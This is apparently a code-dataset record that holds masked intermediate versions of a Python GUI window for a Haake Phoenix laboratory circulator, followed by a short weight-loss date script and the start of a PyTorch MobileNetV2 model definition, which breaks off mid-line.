(1, 2, 'fuzzystatus',\n 'Fuzzy status'), (1, 3, 'watchdog_on', 'Watchdog'), (1, 4,\n 'watchdog_setpoint', 'Watchdog setpoint')]:\n self.indicators[vn] = Indicator(label, '--', IndicatorState.UNKNOWN\n )\n othergrid.attach(self.indicators[vn], column, row, 1, 1)\n self.update_indicators()\n\n def on_mainwidget_map(self, window):\n if super().on_mainwidget_map(window):\n return True\n self.update_indicators()\n <mask token>\n <mask token>\n <mask token>\n\n def on_fuzzyid_switch_state_set(self, switch, state):\n self.instrument.get_device('haakephoenix').set_variable('fuzzyid',\n state)\n return True\n\n def on_set_setpoint(self, button):\n spinbutton = self.builder.get_object('setpoint_spin')\n self.instrument.get_device('haakephoenix').set_variable('setpoint',\n spinbutton.get_value())\n\n def on_set_lowlimit(self, button):\n spinbutton = self.builder.get_object('lowlimit_spin')\n self.instrument.get_device('haakephoenix').set_variable('lowlimit',\n spinbutton.get_value())\n <mask token>\n\n def on_update_rtc(self, button):\n now = datetime.datetime.now()\n self.instrument.get_device('haakephoenix').set_variable('date', now\n .date())\n self.instrument.get_device('haakephoenix').set_variable('time', now\n .time())\n", "step-2": "<mask token>\n\n\nclass HaakePhoenix(ToolWindow):\n <mask token>\n\n def __init__(self, *args, **wargs):\n self.indicators = {}\n super().__init__(*args, **wargs)\n\n def init_gui(self, *args, **kwargs):\n statusgrid = self.builder.get_object('statusgrid')\n for row, column, vn, label in [(0, 0, '_status', 'Status'), (0, 1,\n 'setpoint', 'Target temperature'), (0, 2, 'temperature',\n 'Temperature'), (0, 3, 'pump_power', 'Pump speed'), (0, 4,\n 'control_on', 'Temperature control'), (1, 0, 'lowlimit',\n 'Low limit'), (1, 1, 'highlimit', 'High limit'), (1, 2,\n 'cooling_on', 'Cooling'), (1, 3, 'control_external', 'Control'),\n (1, 4, 'diffcontrol_on', 'Differential control')]:\n self.indicators[vn] = Indicator(label, '--', IndicatorState.UNKNOWN\n )\n statusgrid.attach(self.indicators[vn], column, row, 1, 1)\n errorgrid = self.builder.get_object('errorgrid')\n for row, column, vn, label in [(0, 0, 'external_pt100_error',\n 'External Pt100'), (0, 1, 'internal_pt100_error',\n 'Internal Pt100'), (0, 2, 'liquid_level_low_error',\n 'Liquid level'), (0, 3, 'liquid_level_alarm_error',\n 'Liquid level alarm'), (0, 4, 'cooling_error', 'Cooling system'\n ), (1, 0, 'pump_overload_error', 'Pump'), (1, 1,\n 'external_alarm_error', 'External alarm'), (1, 2,\n 'overtemperature_error', 'Overtemperature'), (1, 3,\n 'main_relay_missing_error', 'Main relay'), (1, 4, 'faultstatus',\n 'Status flags')]:\n self.indicators[vn] = Indicator(label, '--', IndicatorState.UNKNOWN\n )\n errorgrid.attach(self.indicators[vn], column, row, 1, 1)\n othergrid = self.builder.get_object('othergrid')\n for row, column, vn, label in [(0, 0, 'firmwareversion',\n 'Firmware version'), (0, 1, 'date', 'Date'), (0, 2, 'time',\n 'Time'), (0, 3, 'autostart', 'Autostart'), (0, 4, 'beep',\n 'Beep'), (1, 0, 'fuzzyid', 'Fuzzy identification'), (1, 1,\n 'fuzzycontrol', 'Fuzzy control'), (1, 2, 'fuzzystatus',\n 'Fuzzy status'), (1, 3, 'watchdog_on', 'Watchdog'), (1, 4,\n 'watchdog_setpoint', 'Watchdog setpoint')]:\n self.indicators[vn] = Indicator(label, '--', IndicatorState.UNKNOWN\n )\n othergrid.attach(self.indicators[vn], column, row, 1, 1)\n self.update_indicators()\n\n def on_mainwidget_map(self, window):\n if super().on_mainwidget_map(window):\n return True\n self.update_indicators()\n <mask token>\n <mask token>\n\n def on_circulator_switch_state_set(self, switch, state):\n dev = self.instrument.get_device('haakephoenix')\n if state:\n dev.execute_command('start')\n else:\n dev.execute_command('stop')\n return True\n\n def on_fuzzyid_switch_state_set(self, switch, state):\n self.instrument.get_device('haakephoenix').set_variable('fuzzyid',\n state)\n return True\n\n def on_set_setpoint(self, button):\n spinbutton = self.builder.get_object('setpoint_spin')\n self.instrument.get_device('haakephoenix').set_variable('setpoint',\n spinbutton.get_value())\n\n def on_set_lowlimit(self, button):\n spinbutton = self.builder.get_object('lowlimit_spin')\n self.instrument.get_device('haakephoenix').set_variable('lowlimit',\n spinbutton.get_value())\n\n def on_set_highlimit(self, button):\n spinbutton = self.builder.get_object('highlimit_spin')\n self.instrument.get_device('haakephoenix').set_variable('highlimit',\n spinbutton.get_value())\n\n def on_update_rtc(self, button):\n now = datetime.datetime.now()\n self.instrument.get_device('haakephoenix').set_variable('date', now\n .date())\n self.instrument.get_device('haakephoenix').set_variable('time', now\n .time())\n", "step-3": "<mask token>\n\n\nclass HaakePhoenix(ToolWindow):\n required_devices = ['haakephoenix']\n\n def __init__(self, *args, **wargs):\n self.indicators = {}\n super().__init__(*args, **wargs)\n\n def init_gui(self, *args, **kwargs):\n statusgrid = self.builder.get_object('statusgrid')\n for row, column, vn, label in [(0, 0, '_status', 'Status'), (0, 1,\n 'setpoint', 'Target temperature'), (0, 2, 'temperature',\n 'Temperature'), (0, 3, 'pump_power', 'Pump speed'), (0, 4,\n 'control_on', 'Temperature control'), (1, 0, 'lowlimit',\n 'Low limit'), (1, 1, 'highlimit', 'High limit'), (1, 2,\n 'cooling_on', 'Cooling'), (1, 3, 'control_external', 'Control'),\n (1, 4, 'diffcontrol_on', 'Differential control')]:\n self.indicators[vn] = Indicator(label, '--', IndicatorState.UNKNOWN\n )\n statusgrid.attach(self.indicators[vn], column, row, 1, 1)\n errorgrid = self.builder.get_object('errorgrid')\n for row, column, vn, label in [(0, 0, 'external_pt100_error',\n 'External Pt100'), (0, 1, 'internal_pt100_error',\n 'Internal Pt100'), (0, 2, 'liquid_level_low_error',\n 'Liquid level'), (0, 3, 'liquid_level_alarm_error',\n 'Liquid level alarm'), (0, 4, 'cooling_error', 'Cooling system'\n ), (1, 0, 'pump_overload_error', 'Pump'), (1, 1,\n 'external_alarm_error', 'External alarm'), (1, 2,\n 'overtemperature_error', 'Overtemperature'), (1, 3,\n 'main_relay_missing_error', 'Main relay'), (1, 4, 'faultstatus',\n 'Status flags')]:\n self.indicators[vn] = Indicator(label, '--', IndicatorState.UNKNOWN\n )\n errorgrid.attach(self.indicators[vn], column, row, 1, 1)\n othergrid = self.builder.get_object('othergrid')\n for row, column, vn, label in [(0, 0, 'firmwareversion',\n 'Firmware version'), (0, 1, 'date', 'Date'), (0, 2, 'time',\n 'Time'), (0, 3, 'autostart', 'Autostart'), (0, 4, 'beep',\n 'Beep'), (1, 0, 'fuzzyid', 'Fuzzy identification'), (1, 1,\n 'fuzzycontrol', 'Fuzzy control'), (1, 2, 'fuzzystatus',\n 'Fuzzy status'), (1, 3, 'watchdog_on', 'Watchdog'), (1, 4,\n 'watchdog_setpoint', 'Watchdog setpoint')]:\n self.indicators[vn] = Indicator(label, '--', IndicatorState.UNKNOWN\n )\n othergrid.attach(self.indicators[vn], column, row, 1, 1)\n self.update_indicators()\n\n def on_mainwidget_map(self, window):\n if super().on_mainwidget_map(window):\n return True\n self.update_indicators()\n\n def update_indicators(self):\n dev = self.instrument.get_device('haakephoenix')\n for vn in self.indicators:\n self.on_device_variable_change(dev, vn, dev.get_variable(vn))\n self.builder.get_object('setpoint_adjustment').set_value(dev.\n get_variable('setpoint'))\n self.builder.get_object('lowlimit_adjustment').set_value(dev.\n get_variable('lowlimit'))\n self.builder.get_object('highlimit_adjustment').set_value(dev.\n get_variable('highlimit'))\n\n def on_device_variable_change(self, device, variablename, newvalue):\n if variablename in ['_status', 'firmwareversion', 'fuzzycontrol',\n 'date', 'time', 'faultstatus']:\n self.indicators[variablename].set_value(str(newvalue),\n IndicatorState.NEUTRAL)\n elif variablename in ['setpoint', 'temperature', 'lowlimit',\n 'highlimit']:\n self.indicators[variablename].set_value('%.2f°C' % newvalue,\n IndicatorState.NEUTRAL)\n elif variablename in ['control_on', 'cooling_on', 'diffcontrol_on',\n 'watchdog_on', 'beep', 'fuzzyid', 'fuzzystatus', 'autostart']:\n self.indicators[variablename].set_value(['OFF', 'ON'][int(bool(\n newvalue))], [IndicatorState.ERROR, IndicatorState.OK][int(\n bool(newvalue))])\n elif variablename in ['pump_power']:\n self.indicators[variablename].set_value('%.2f %%' % newvalue, [\n IndicatorState.ERROR, IndicatorState.OK][newvalue > 0])\n elif variablename in ['external_pt100_error',\n 'internal_pt100_error', 'liquid_level_low_error',\n 'cooling_error', 'main_relay_missing_error']:\n self.indicators[variablename].set_value(['OK', 'ERROR'][int(\n bool(newvalue))], [IndicatorState.OK, IndicatorState.ERROR]\n [int(bool(newvalue))])\n elif variablename in ['liquid_level_alarm_error',\n 'external_alarm_error', 'overtemperature_error']:\n self.indicators[variablename].set_value(['OK', 'ALARM'][int(\n bool(newvalue))], [IndicatorState.OK, IndicatorState.ERROR]\n [int(bool(newvalue))])\n elif variablename in ['pump_overload_error']:\n self.indicators[variablename].set_value(['OK', 'OVERLOAD'][int(\n bool(newvalue))], [IndicatorState.OK, IndicatorState.ERROR]\n [int(bool(newvalue))])\n elif variablename in ['watchdog_setpoint']:\n self.indicators[variablename].set_value('%.2f sec' % newvalue,\n IndicatorState.UNKNOWN)\n elif variablename in ['control_external']:\n self.indicators[variablename].set_value(['Internal', 'External'\n ][int(bool(newvalue))], IndicatorState.NEUTRAL)\n if variablename == 'fuzzyid':\n self.builder.get_object('fuzzyid_switch').set_state(bool(newvalue))\n elif variablename == 'pump_power':\n self.builder.get_object('circulator_switch').set_state(newvalue > 0\n )\n return False\n\n def on_circulator_switch_state_set(self, switch, state):\n dev = self.instrument.get_device('haakephoenix')\n if state:\n dev.execute_command('start')\n else:\n dev.execute_command('stop')\n return True\n\n def on_fuzzyid_switch_state_set(self, switch, state):\n self.instrument.get_device('haakephoenix').set_variable('fuzzyid',\n state)\n return True\n\n def on_set_setpoint(self, button):\n spinbutton = self.builder.get_object('setpoint_spin')\n self.instrument.get_device('haakephoenix').set_variable('setpoint',\n spinbutton.get_value())\n\n def on_set_lowlimit(self, button):\n spinbutton = self.builder.get_object('lowlimit_spin')\n self.instrument.get_device('haakephoenix').set_variable('lowlimit',\n spinbutton.get_value())\n\n def on_set_highlimit(self, button):\n spinbutton = self.builder.get_object('highlimit_spin')\n self.instrument.get_device('haakephoenix').set_variable('highlimit',\n spinbutton.get_value())\n\n def on_update_rtc(self, button):\n now = datetime.datetime.now()\n self.instrument.get_device('haakephoenix').set_variable('date', now\n .date())\n self.instrument.get_device('haakephoenix').set_variable('time', now\n .time())\n", "step-4": "import datetime\nfrom ..core.indicator import Indicator, IndicatorState\nfrom ..core.toolwindow import ToolWindow\n\n\nclass HaakePhoenix(ToolWindow):\n required_devices = ['haakephoenix']\n\n def __init__(self, *args, **wargs):\n self.indicators = {}\n super().__init__(*args, **wargs)\n\n def init_gui(self, *args, **kwargs):\n statusgrid = self.builder.get_object('statusgrid')\n for row, column, vn, label in [(0, 0, '_status', 'Status'), (0, 1,\n 'setpoint', 'Target temperature'), (0, 2, 'temperature',\n 'Temperature'), (0, 3, 'pump_power', 'Pump speed'), (0, 4,\n 'control_on', 'Temperature control'), (1, 0, 'lowlimit',\n 'Low limit'), (1, 1, 'highlimit', 'High limit'), (1, 2,\n 'cooling_on', 'Cooling'), (1, 3, 'control_external', 'Control'),\n (1, 4, 'diffcontrol_on', 'Differential control')]:\n self.indicators[vn] = Indicator(label, '--', IndicatorState.UNKNOWN\n )\n statusgrid.attach(self.indicators[vn], column, row, 1, 1)\n errorgrid = self.builder.get_object('errorgrid')\n for row, column, vn, label in [(0, 0, 'external_pt100_error',\n 'External Pt100'), (0, 1, 'internal_pt100_error',\n 'Internal Pt100'), (0, 2, 'liquid_level_low_error',\n 'Liquid level'), (0, 3, 'liquid_level_alarm_error',\n 'Liquid level alarm'), (0, 4, 'cooling_error', 'Cooling system'\n ), (1, 0, 'pump_overload_error', 'Pump'), (1, 1,\n 'external_alarm_error', 'External alarm'), (1, 2,\n 'overtemperature_error', 'Overtemperature'), (1, 3,\n 'main_relay_missing_error', 'Main relay'), (1, 4, 'faultstatus',\n 'Status flags')]:\n self.indicators[vn] = Indicator(label, '--', IndicatorState.UNKNOWN\n )\n errorgrid.attach(self.indicators[vn], column, row, 1, 1)\n othergrid = self.builder.get_object('othergrid')\n for row, column, vn, label in [(0, 0, 'firmwareversion',\n 'Firmware version'), (0, 1, 'date', 'Date'), (0, 2, 'time',\n 'Time'), (0, 3, 'autostart', 'Autostart'), (0, 4, 'beep',\n 'Beep'), (1, 0, 'fuzzyid', 'Fuzzy identification'), (1, 1,\n 'fuzzycontrol', 'Fuzzy control'), (1, 2, 'fuzzystatus',\n 'Fuzzy status'), (1, 3, 'watchdog_on', 'Watchdog'), (1, 4,\n 'watchdog_setpoint', 'Watchdog setpoint')]:\n self.indicators[vn] = Indicator(label, '--', IndicatorState.UNKNOWN\n )\n othergrid.attach(self.indicators[vn], column, row, 1, 1)\n self.update_indicators()\n\n def on_mainwidget_map(self, window):\n if super().on_mainwidget_map(window):\n return True\n self.update_indicators()\n\n def update_indicators(self):\n dev = self.instrument.get_device('haakephoenix')\n for vn in self.indicators:\n self.on_device_variable_change(dev, vn, dev.get_variable(vn))\n self.builder.get_object('setpoint_adjustment').set_value(dev.\n get_variable('setpoint'))\n self.builder.get_object('lowlimit_adjustment').set_value(dev.\n get_variable('lowlimit'))\n self.builder.get_object('highlimit_adjustment').set_value(dev.\n get_variable('highlimit'))\n\n def on_device_variable_change(self, device, variablename, newvalue):\n if variablename in ['_status', 'firmwareversion', 'fuzzycontrol',\n 'date', 'time', 'faultstatus']:\n self.indicators[variablename].set_value(str(newvalue),\n IndicatorState.NEUTRAL)\n elif variablename in ['setpoint', 'temperature', 'lowlimit',\n 'highlimit']:\n self.indicators[variablename].set_value('%.2f°C' % newvalue,\n IndicatorState.NEUTRAL)\n elif variablename in ['control_on', 'cooling_on', 'diffcontrol_on',\n 'watchdog_on', 'beep', 'fuzzyid', 'fuzzystatus', 'autostart']:\n self.indicators[variablename].set_value(['OFF', 'ON'][int(bool(\n newvalue))], [IndicatorState.ERROR, IndicatorState.OK][int(\n bool(newvalue))])\n elif variablename in ['pump_power']:\n self.indicators[variablename].set_value('%.2f %%' % newvalue, [\n IndicatorState.ERROR, IndicatorState.OK][newvalue > 0])\n elif variablename in ['external_pt100_error',\n 'internal_pt100_error', 'liquid_level_low_error',\n 'cooling_error', 'main_relay_missing_error']:\n self.indicators[variablename].set_value(['OK', 'ERROR'][int(\n bool(newvalue))], [IndicatorState.OK, IndicatorState.ERROR]\n [int(bool(newvalue))])\n elif variablename in ['liquid_level_alarm_error',\n 'external_alarm_error', 'overtemperature_error']:\n self.indicators[variablename].set_value(['OK', 'ALARM'][int(\n bool(newvalue))], [IndicatorState.OK, IndicatorState.ERROR]\n [int(bool(newvalue))])\n elif variablename in ['pump_overload_error']:\n self.indicators[variablename].set_value(['OK', 'OVERLOAD'][int(\n bool(newvalue))], [IndicatorState.OK, IndicatorState.ERROR]\n [int(bool(newvalue))])\n elif variablename in ['watchdog_setpoint']:\n self.indicators[variablename].set_value('%.2f sec' % newvalue,\n IndicatorState.UNKNOWN)\n elif variablename in ['control_external']:\n self.indicators[variablename].set_value(['Internal', 'External'\n ][int(bool(newvalue))], IndicatorState.NEUTRAL)\n if variablename == 'fuzzyid':\n self.builder.get_object('fuzzyid_switch').set_state(bool(newvalue))\n elif variablename == 'pump_power':\n self.builder.get_object('circulator_switch').set_state(newvalue > 0\n )\n return False\n\n def on_circulator_switch_state_set(self, switch, state):\n dev = self.instrument.get_device('haakephoenix')\n if state:\n dev.execute_command('start')\n else:\n dev.execute_command('stop')\n return True\n\n def on_fuzzyid_switch_state_set(self, switch, state):\n self.instrument.get_device('haakephoenix').set_variable('fuzzyid',\n state)\n return True\n\n def on_set_setpoint(self, button):\n spinbutton = self.builder.get_object('setpoint_spin')\n self.instrument.get_device('haakephoenix').set_variable('setpoint',\n spinbutton.get_value())\n\n def on_set_lowlimit(self, button):\n spinbutton = self.builder.get_object('lowlimit_spin')\n self.instrument.get_device('haakephoenix').set_variable('lowlimit',\n spinbutton.get_value())\n\n def on_set_highlimit(self, button):\n spinbutton = self.builder.get_object('highlimit_spin')\n self.instrument.get_device('haakephoenix').set_variable('highlimit',\n spinbutton.get_value())\n\n def on_update_rtc(self, button):\n now = datetime.datetime.now()\n self.instrument.get_device('haakephoenix').set_variable('date', now\n .date())\n self.instrument.get_device('haakephoenix').set_variable('time', now\n .time())\n", "step-5": "import datetime\n\nfrom ..core.indicator import Indicator, IndicatorState\nfrom ..core.toolwindow import ToolWindow\n\n\nclass HaakePhoenix(ToolWindow):\n required_devices = ['haakephoenix']\n\n def __init__(self, *args, **wargs):\n self.indicators = {}\n super().__init__(*args, **wargs)\n\n def init_gui(self, *args, **kwargs):\n statusgrid = self.builder.get_object('statusgrid')\n for row, column, vn, label in [(0, 0, '_status', 'Status'),\n (0, 1, 'setpoint', 'Target temperature'),\n (0, 2, 'temperature', 'Temperature'),\n (0, 3, 'pump_power', 'Pump speed'),\n (0, 4, 'control_on', 'Temperature control'),\n (1, 0, 'lowlimit', 'Low limit'),\n (1, 1, 'highlimit', 'High limit'),\n (1, 2, 'cooling_on', 'Cooling'),\n (1, 3, 'control_external', 'Control'),\n (1, 4, 'diffcontrol_on', 'Differential control')]:\n self.indicators[vn] = Indicator(label, '--', IndicatorState.UNKNOWN)\n statusgrid.attach(self.indicators[vn], column, row, 1, 1)\n errorgrid = self.builder.get_object('errorgrid')\n for row, column, vn, label in [(0, 0, 'external_pt100_error', 'External Pt100'), #\n (0, 1, 'internal_pt100_error', 'Internal Pt100'), #\n (0, 2, 'liquid_level_low_error', 'Liquid level'), #\n (0, 3, 'liquid_level_alarm_error', 'Liquid level alarm'), #\n (0, 4, 'cooling_error', 'Cooling system'), #\n (1, 0, 'pump_overload_error', 'Pump'), #\n (1, 1, 'external_alarm_error', 'External alarm'), #\n (1, 2, 'overtemperature_error', 'Overtemperature'), #\n (1, 3, 'main_relay_missing_error', 'Main relay'), #\n (1, 4, 'faultstatus', 'Status flags')]: #\n self.indicators[vn] = Indicator(label, '--', IndicatorState.UNKNOWN)\n errorgrid.attach(self.indicators[vn], column, row, 1, 1)\n othergrid = self.builder.get_object('othergrid')\n for row, column, vn, label in [(0, 0, 'firmwareversion', 'Firmware version'), #\n (0, 1, 'date', 'Date'), #\n (0, 2, 'time', 'Time'), #\n (0, 3, 'autostart', 'Autostart'), #\n (0, 4, 'beep', 'Beep'), #\n (1, 0, 'fuzzyid', 'Fuzzy identification'), #\n (1, 1, 'fuzzycontrol', 'Fuzzy control'), #\n (1, 2, 'fuzzystatus', 'Fuzzy status'), #\n (1, 3, 'watchdog_on', 'Watchdog'), #\n (1, 4, 'watchdog_setpoint', 'Watchdog setpoint')]: #\n self.indicators[vn] = Indicator(label, '--', IndicatorState.UNKNOWN)\n othergrid.attach(self.indicators[vn], column, row, 1, 1)\n self.update_indicators()\n\n def on_mainwidget_map(self, window):\n if super().on_mainwidget_map(window):\n return True\n self.update_indicators()\n\n def update_indicators(self):\n dev = self.instrument.get_device('haakephoenix')\n for vn in self.indicators:\n self.on_device_variable_change(dev, vn, dev.get_variable(vn))\n self.builder.get_object('setpoint_adjustment').set_value(\n dev.get_variable('setpoint'))\n self.builder.get_object('lowlimit_adjustment').set_value(\n dev.get_variable('lowlimit'))\n self.builder.get_object('highlimit_adjustment').set_value(\n dev.get_variable('highlimit'))\n\n def on_device_variable_change(self, device, variablename, newvalue):\n if variablename in ['_status', 'firmwareversion', 'fuzzycontrol', 'date', 'time', 'faultstatus']:\n self.indicators[variablename].set_value(str(newvalue), IndicatorState.NEUTRAL)\n elif variablename in ['setpoint', 'temperature', 'lowlimit', 'highlimit']:\n self.indicators[variablename].set_value('%.2f°C' % newvalue, IndicatorState.NEUTRAL)\n elif variablename in ['control_on', 'cooling_on', 'diffcontrol_on', 'watchdog_on', 'beep', 'fuzzyid',\n 'fuzzystatus',\n 'autostart']:\n self.indicators[variablename].set_value(['OFF', 'ON'][int(bool(newvalue))],\n [IndicatorState.ERROR, IndicatorState.OK][int(bool(newvalue))])\n elif variablename in ['pump_power']:\n self.indicators[variablename].set_value('%.2f %%' % newvalue,\n [IndicatorState.ERROR, IndicatorState.OK][newvalue > 0])\n elif variablename in ['external_pt100_error', 'internal_pt100_error', 'liquid_level_low_error', 'cooling_error',\n 'main_relay_missing_error']:\n self.indicators[variablename].set_value(['OK', 'ERROR'][int(bool(newvalue))],\n [IndicatorState.OK, IndicatorState.ERROR][int(bool(newvalue))])\n elif variablename in ['liquid_level_alarm_error', 'external_alarm_error', 'overtemperature_error']:\n self.indicators[variablename].set_value(['OK', 'ALARM'][int(bool(newvalue))],\n [IndicatorState.OK, IndicatorState.ERROR][int(bool(newvalue))])\n elif variablename in ['pump_overload_error']:\n self.indicators[variablename].set_value(['OK', 'OVERLOAD'][int(bool(newvalue))],\n [IndicatorState.OK, IndicatorState.ERROR][int(bool(newvalue))])\n elif variablename in ['watchdog_setpoint']:\n self.indicators[variablename].set_value('%.2f sec' % newvalue, IndicatorState.UNKNOWN)\n elif variablename in ['control_external']:\n self.indicators[variablename].set_value(['Internal', 'External'][int(bool(newvalue))],\n IndicatorState.NEUTRAL)\n\n if variablename == 'fuzzyid':\n self.builder.get_object('fuzzyid_switch').set_state(bool(newvalue))\n elif variablename == 'pump_power':\n self.builder.get_object('circulator_switch').set_state(newvalue > 0)\n return False\n\n def on_circulator_switch_state_set(self, switch, state):\n dev = self.instrument.get_device('haakephoenix')\n if state:\n dev.execute_command('start')\n else:\n dev.execute_command('stop')\n return True\n\n def on_fuzzyid_switch_state_set(self, switch, state):\n self.instrument.get_device('haakephoenix').set_variable('fuzzyid', state)\n return True\n\n def on_set_setpoint(self, button):\n spinbutton = self.builder.get_object('setpoint_spin')\n self.instrument.get_device('haakephoenix').set_variable('setpoint', spinbutton.get_value())\n\n def on_set_lowlimit(self, button):\n spinbutton = self.builder.get_object('lowlimit_spin')\n self.instrument.get_device('haakephoenix').set_variable('lowlimit', spinbutton.get_value())\n\n def on_set_highlimit(self, button):\n spinbutton = self.builder.get_object('highlimit_spin')\n self.instrument.get_device('haakephoenix').set_variable('highlimit', spinbutton.get_value())\n\n def on_update_rtc(self, button):\n now = datetime.datetime.now()\n self.instrument.get_device('haakephoenix').set_variable('date', now.date())\n self.instrument.get_device('haakephoenix').set_variable('time', now.time())\n", "step-ids": [ 8, 10, 13, 14, 15 ] }
[ 8, 10, 13, 14, 15 ]
import datetime # weightloss script currentWeight = 73 goalWeight = 67 avgKgPerWeek = 0.45 startDate = datetime.date.today() endDate = startDate while currentWeight > goalWeight: # adding 7 days to simulate a week passing endDate += datetime.timedelta(days=7) currentWeight -= avgKgPerWeek print(endDate, round(currentWeight, 2)) print(f"Start date: {startDate.month.no}, end date: {endDate} ") print(f"Weeks to achieve weight goal: {(endDate - startDate).days // 7}, {(endDate - startDate).days} days")
normal
{ "blob_id": "7fb568880c40895870a0c541d9a88a8070a79e5b", "index": 5762, "step-1": "<mask token>\n", "step-2": "<mask token>\nwhile currentWeight > goalWeight:\n endDate += datetime.timedelta(days=7)\n currentWeight -= avgKgPerWeek\n print(endDate, round(currentWeight, 2))\nprint(f'Start date: {startDate.month.no}, end date: {endDate} ')\nprint(\n f'Weeks to achieve weight goal: {(endDate - startDate).days // 7}, {(endDate - startDate).days} days'\n )\n", "step-3": "<mask token>\ncurrentWeight = 73\ngoalWeight = 67\navgKgPerWeek = 0.45\nstartDate = datetime.date.today()\nendDate = startDate\nwhile currentWeight > goalWeight:\n endDate += datetime.timedelta(days=7)\n currentWeight -= avgKgPerWeek\n print(endDate, round(currentWeight, 2))\nprint(f'Start date: {startDate.month.no}, end date: {endDate} ')\nprint(\n f'Weeks to achieve weight goal: {(endDate - startDate).days // 7}, {(endDate - startDate).days} days'\n )\n", "step-4": "import datetime\ncurrentWeight = 73\ngoalWeight = 67\navgKgPerWeek = 0.45\nstartDate = datetime.date.today()\nendDate = startDate\nwhile currentWeight > goalWeight:\n endDate += datetime.timedelta(days=7)\n currentWeight -= avgKgPerWeek\n print(endDate, round(currentWeight, 2))\nprint(f'Start date: {startDate.month.no}, end date: {endDate} ')\nprint(\n f'Weeks to achieve weight goal: {(endDate - startDate).days // 7}, {(endDate - startDate).days} days'\n )\n", "step-5": "import datetime\n\n# weightloss script\ncurrentWeight = 73\ngoalWeight = 67\navgKgPerWeek = 0.45\n\nstartDate = datetime.date.today()\nendDate = startDate\n\nwhile currentWeight > goalWeight:\n\n # adding 7 days to simulate a week passing\n endDate += datetime.timedelta(days=7)\n currentWeight -= avgKgPerWeek\n \n print(endDate, round(currentWeight, 2))\n\n\nprint(f\"Start date: {startDate.month.no}, end date: {endDate} \")\nprint(f\"Weeks to achieve weight goal: {(endDate - startDate).days // 7}, {(endDate - startDate).days} days\")", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
# Given an unsorted integer array nums, find the smallest missing positive integer. class Solution: def firstMissingPositive(self, nums: List[int]) -> int: # if nums is emtpy, first pos int is 1 if not nums: return 1 maxnum = max(nums) # for speed we assign max of nums to var maxnum # if maxnum is neg in or 0, first pos int is 1 if maxnum < 1: return 1 # else, for all in from 1 to maxnum + 2, return the first missing int else: for i in range(1, (maxnum+2)): if i not in nums: return i
normal
{ "blob_id": "09905d4b5ad2e59578d874db171aafb6c42db105", "index": 8609, "step-1": "<mask token>\n", "step-2": "class Solution:\n <mask token>\n", "step-3": "class Solution:\n\n def firstMissingPositive(self, nums: List[int]) ->int:\n if not nums:\n return 1\n maxnum = max(nums)\n if maxnum < 1:\n return 1\n else:\n for i in range(1, maxnum + 2):\n if i not in nums:\n return i\n", "step-4": "# Given an unsorted integer array nums, find the smallest missing positive integer.\nclass Solution:\n def firstMissingPositive(self, nums: List[int]) -> int:\n # if nums is emtpy, first pos int is 1\n if not nums:\n return 1\n maxnum = max(nums) # for speed we assign max of nums to var maxnum\n # if maxnum is neg in or 0, first pos int is 1\n if maxnum < 1:\n return 1 \n # else, for all in from 1 to maxnum + 2, return the first missing int\n else:\n for i in range(1, (maxnum+2)):\n if i not in nums:\n return i\n \n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# open a converted base to bits file and convert it back to the base sequences seq2 = '' with open('chr01.txt') as a: while 1: seq = a.read(2) # print(seq) seq = seq.replace('00', 'c').replace('01', 'g').replace('10', 'a').replace('11', 't') seq2 += seq if not seq: break print(len(seq2)) print(seq2)
normal
{ "blob_id": "c2f859e0ed0e812768dec04b2b1f9ddd349350f6", "index": 9780, "step-1": "<mask token>\n", "step-2": "<mask token>\nwith open('chr01.txt') as a:\n while 1:\n seq = a.read(2)\n seq = seq.replace('00', 'c').replace('01', 'g').replace('10', 'a'\n ).replace('11', 't')\n seq2 += seq\n if not seq:\n break\nprint(len(seq2))\nprint(seq2)\n", "step-3": "seq2 = ''\nwith open('chr01.txt') as a:\n while 1:\n seq = a.read(2)\n seq = seq.replace('00', 'c').replace('01', 'g').replace('10', 'a'\n ).replace('11', 't')\n seq2 += seq\n if not seq:\n break\nprint(len(seq2))\nprint(seq2)\n", "step-4": "# open a converted base to bits file and convert it back to the base sequences\n\nseq2 = ''\nwith open('chr01.txt') as a:\n while 1:\n seq = a.read(2)\n # print(seq)\n seq = seq.replace('00', 'c').replace('01', 'g').replace('10', 'a').replace('11', 't')\n seq2 += seq\n if not seq:\n break\n\nprint(len(seq2))\nprint(seq2)\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
from __future__ import division import torch import torch.nn as nn import math def conv_bn(inp, oup, stride): return nn.Sequential( nn.Conv2d(inp, oup, 3, stride, 1, bias=False), nn.BatchNorm2d(oup), nn.ReLU(inplace=True) ) def conv_1x1_bn(inp, oup): return nn.Sequential( nn.Conv2d(inp, oup, 1, 1, 0, bias=False), nn.BatchNorm2d(oup), nn.ReLU(inplace=True) ) class InvertedResidual(nn.Module): def __init__(self, inp, oup, stride, expand_ratio): super(InvertedResidual, self).__init__() self.stride = stride assert stride in [1, 2] hidden_dim = round(inp * expand_ratio) self.use_res_connect = self.stride == 1 and inp == oup if expand_ratio == 1: self.conv = nn.Sequential( # dw nn.Conv2d(hidden_dim, hidden_dim, 3, stride, 1, groups=hidden_dim, bias=False), nn.BatchNorm2d(hidden_dim), nn.ReLU(inplace=True), # pw-linear nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False), nn.BatchNorm2d(oup), ) else: self.conv = nn.Sequential( # pw nn.Conv2d(inp, hidden_dim, 1, 1, 0, bias=False), nn.BatchNorm2d(hidden_dim), nn.ReLU(inplace=True), # dw nn.Conv2d(hidden_dim, hidden_dim, 3, stride, 1, groups=hidden_dim, bias=False), nn.BatchNorm2d(hidden_dim), nn.ReLU(inplace=True), # pw-linear nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False), nn.BatchNorm2d(oup), ) def forward(self, x): if self.use_res_connect: return x + self.conv(x) else: return self.conv(x) class SmallMobileNetV2(nn.Module): def __init__(self, widen_factor=1.0, num_classes=1000): #, input_size=224 super(SmallMobileNetV2, self).__init__() block = InvertedResidual input_channel = 8 last_channel = 64 interverted_residual_setting = [ # t, c, n, s [1, 8, 1, 1], [6, 12, 2, 2], [6, 16, 2, 2], [6, 24, 3, 2], [6, 32, 3, 2], [6, 48, 3, 2], [6, 64, 2, 2], [6, 80, 1, 1], ] # building first layer # assert input_size % 32 == 0 input_channel = int(input_channel * widen_factor) self.last_channel = int(last_channel * widen_factor) if widen_factor > 1.0 else last_channel self.features = [conv_bn(3, input_channel, 2)] # building inverted residual blocks for t, c, 